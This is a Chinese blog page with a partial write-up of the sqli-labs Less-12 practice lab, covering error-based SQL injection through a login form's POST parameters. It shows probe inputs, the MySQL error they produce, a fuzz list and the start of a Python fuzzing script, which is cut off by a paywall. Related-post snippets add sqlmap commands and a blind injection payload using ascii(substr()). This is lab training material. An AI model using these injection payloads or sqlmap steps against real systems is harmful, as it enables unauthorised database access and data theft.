sqli-lab-less12

最新推荐文章于 2025-04-25 18:07:04 发布
最新推荐文章于 2025-04-25 18:07:04 发布
阅读量166 收藏
点赞数
分类专栏: sql-lab 文章标签: 数据库 网络安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Sa1nZen/article/details/132083391
版权
博客围绕sqli-lab-less12展开,介绍了靶标地址,进行了漏洞探测与源码分析,开展黑盒与白盒测试,还涉及脚本撰写和sqlmap的使用,最后进行总结,聚焦数据库安全相关内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqli-lab-less12

一、靶标地址

Less-12 POST-Error Based-Double quotes-String - with twist
#字符型带双引号和括号基于报错的SQL注入
http://127.0.0.1/sqli/less-12/

二、漏洞探测

输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#Your Login name:admin
#Your Password:admin

猜测业务逻辑流程应该是根据输入的username、password去查询然后进行比对
uname=1")&passwd=2&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") and password=("2") LIMIT 0,1' at line 1

猜测语句为 ") and password=("2") LIMIT 0,1
推测语句为select username,password from users where username= ("$uname") and password='$passwd' limit 0,1;

fuzz.txt
'
"
')
")
'))
"))

#使用python脚本进行fuzz
import requests

url="http://192.168.128.159/sqli/less-12/index.php"
#F12查看或者burpsuite抓包
header={
   
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
file = open("./fuzz-12.txt","r")
payloads = file.read().splitlines()

for i in range(len(payloads)):
    print("==============This is "+ str(i) + payloads[i]+"==============")
    subpayload = "1" + payloads[i]
    payload = {
   
            "uname"
最低0.47元/天 解锁文章
SQL注入实例(sqli-labs/less-12
Thewei666的博客
08-06 318
【代码】SQL注入实例(sqli-labs/less-12
sqli-lab-less17
Sa1nZen的博客
08-04 179
sqli-lab-less17。
网络安全-sqlmap实战之sqlilabs-Less12
关注网络安全、云原生安全
07-10 1175
目录 类型 -dbs枚举数据库 类型 基于错误-字符串 错误回显 通过回显可以看出比Less11加了括号 猜测sql语句 select * from users where username=("参数") and password=("参数") LIMIT 0,1 -dbs枚举数据库 python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less12" --dbms mysql -dbs 不要--batch 不使用--b
使用sqlmapsqli-less-12 的题解
weixin_44352058的博客
05-03 819
1.由于该题是post注入,所以我们在用户名密码处随意输入并使用bp进行抓包存储文件。 2.查询注入点 sqlmap.py -r 1.txt 3.查询数据库 sqlmap.py -r 1.txt –dbs 4.查询表 sqlmap.py -r 1.txt -D security –tables 5.查询列 sqlmap.py -r 1.txt -D security -T u...
sqli-labs Less-11,12
2202_75317918的博客
05-21 791
sqli-labs Less-11,12
sqli-labs的less11-14
abwn1278的博客
09-04 127
less11;   明显和前面不同了,需要输入账户名和密码了,那么,很明显,这并不是一个get方式了。   随意输入一个123,123,明显返回错误了。   用burpsuite来抓下包,代理什么的都不在这配置了。   界面输入123,123提交。抓包获得参数。      在得到参数后,直接将参数写入的sqlmap的data段。      系统就把这个请求变成po...
sqli-lab靶场学习(一)——Less1-4(语句闭合,联合注入)
sadoshi的专栏
09-03 1017
最近一段时间想切入安全领域,因为本身有做数据库运维工作,就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外,需要有个实践的环境,刚好看到sqli-lab这个靶场,就打算先用这个来学习。
sqli-lab靶场学习(三)——Less8-10(盲注、时间盲注)
sadoshi的专栏
09-19 727
sqli-lab 8-10关,涉及盲注
sqli-lab靶场学习(四)——Less11-14(post方法)
sadoshi的专栏
09-20 510
第1-10关都是get方法,本关开始进入post方法。其实post也好get也好,本质都差不多,使用的技巧也基本相同。
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12sqlilabs less12
sqli-labs(less-12)
欢迎光临
06-08 1189
有问题....为什么在less-11输入admin' 会报错  输入admin"" 就不会报错在less-12输入admin" 会报错  输入admin' 就不会报错后来发现输入admin'") 都可以使他们报错,哈哈哈这样即可知道是通过("")来闭合参数的接下来就和less-11一样的操作了接下来用sqlmap同理...
sqli-labs less-11 & less-12
water0diamond的博客
03-17 1004
POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的,而从现在开始我们进入post型关卡 post是一种数据提...
sqli-less12题解详细过程
weixin_44352058的博客
04-22 1101
sqli-less12题解 首先我们打开less12看一下 这个题目具有交互界面,有username和password,所以这里我们用不到bp进行拦截。那我们就开始找注入点。 1.在username和password 中都输入 admin 查看结果,可以正常登陆 1: username: admin password: admin 2.那就在username中输入 admin’测试 ...
sqli————Less-12
Fly_鹏程万里
05-11 694
Less-12源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqlmap中常用的几个命令
liweibin812的博客
02-28 1534
1. -u:表示需要探测的目标站点url,例如: sqlmap.py -u http://127.0.0.1/sql1/Less-1/?id=1 注:如果url后参数个数大于等于2个,则需要加上双引号 sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1&username=zhangsan" 2. -r:表示判断一个文本中的请求...
sqlmap 注入技术参数
白菜执笔人的博客
02-26 7669
Web安全攻防 学习笔记 一、Sqlmap 注入技术参数 1.1、sqlmap 设置具体 SQL 注入技术         参数 --technique 用于指定检测注入时所用技术。默认情况下 Sqlmap 会使用自己支持的全部技术进行检测。 此参数后跟表示检测技术的大写字母,其值为 B、E、U、S、T 或 Q,含义如下: B:Boolean-ba...
sqli-labs (less-12)
kukudeshuo的博客
03-09 1470
sqli-labs (less-12) 进入12关,我们发现页面和11关一样,我们先输入用户名和密码进去,我们发现用户名和密码也是使用POST的方式传了上去,那我们像11关一样使用hackbar抓取POST请求 判断注入类型 uname=admin'&passwd=admin&submit=Submit #页面不报错 uname=admin"&passwd=admin&submit=Submit #页面有错误显示 根据输入"时的报错信息我们确定闭合方式为"),也确定为
基于vue框架的电信用户业务管理系统的设计与实现8ly70(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
h2345678的博客
04-25 732
可以控制字体、颜色、间距、布局等视觉表现。[6]师明,曾丹.基于Vue.js和Spring Boot的校招日记系统[J].工业控制计算机,2020,33(01):95-97.[7]胡雅丽.基于Vue.js的“微商城”前端开发设计与实现[J].电子技术与软件工程,2020(20):34-35.[3]张智强,孙福兆,余健等.mysql课程设计案例精编[J].清华大学出版社,2019(8):67-234。[8]李广宏.vue.js前端应用技术分析[J].中国新通信,2019,21(20):115.
MySQL索引优化、SQL分析与运行原理 - Java架构师面试实战
最新发布
南客先生的博客
04-25 610
面试官:马架构,请问您对MySQL的B+树索引有什么理解?马架构:B+树是一种平衡多路查找树,所有的数据节点都存储在叶子节点上。相比于B树,B+树更适合范围查询和排序操作。面试官:那么覆盖索引是什么?马架构:覆盖索引是指查询的数据可以通过索引直接获取,而无需回表读取数据。面试官:如何选择合适的索引?马架构:需要根据查询条件、数据分布和查询频率进行综合评估。面试官:请解释SQL执行计划中的`EXPLAIN`关键字的作用。马架构:`EXPLAIN`可以帮助我们分析SQL的执行过程,包括使用的索引、扫描行数等信息
sqli-lab第五关
03-24
### SQLi-Lab 第五关 解法分析 SQLi-Lab 的第五关通常涉及布尔盲注攻击方式。通过构造特定的 SQL 查询语句,可以逐步推断数据库中的数据内容。以下是针对该关卡的具体解法说明: #### 基本原理 在布尔盲注中,攻击者利用条件判断的结果来推测查询返回的内容。例如,在已知表名 `security.users` 和列名的情况下,可以通过逐位猜测用户名或密码的 ASCII 字符值实现信息提取[^1]。 #### 手动测试方法 假设目标 URL 是 `http://example.com/Less-5/?id=1`,可以通过以下方式进行手动注入尝试: 1. 构造一个基于布尔逻辑的查询字符串,用于验证某个字符是否存在。 2. 使用函数如 `ascii()` 和 `substr()` 来逐一获取字段值的每一位字符。 示例请求如下: ```plaintext ?id=1' AND ascii(substr((SELECT username FROM security.users LIMIT 0,1),1,1))>97-- ``` 上述请求的作用是检查第一个用户的用户名的第一个字符是否大于 ASCII 值 97(即字母 'a')。如果页面正常显示,则表示条件成立;反之则不成立。通过不断调整比较值并记录结果,最终可还原完整的用户名或密码。 #### 自动化工具辅助 对于更复杂的场景或者为了提高效率,推荐使用自动化渗透测试工具 Sqlmap 进行扫描和数据分析。执行命令前需确认目标站点支持 GET 请求参数传递,并准备好相应的配置文件或直接指定URL地址[^2]。 以第5关为例,启动Sqlmap时应包含以下选项: ```bash python sqlmap.py -u "http://sqli-labs-php7-master/Less-5/?id=1" --batch -D security -T users --columns ``` 此脚本会自动探测可用漏洞并向用户提供关于选定数据库及其结构的信息摘要。 另外需要注意的是某些特殊情况下可能还需要额外提供闭合符号或者其他上下文依赖型语法片段才能成功完成整个过程[^3]。 ### 注意事项 实际操作过程中应当遵循合法授权范围内的活动准则,未经授权不得对任何真实环境下的网络服务实施此类行为以免触犯法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值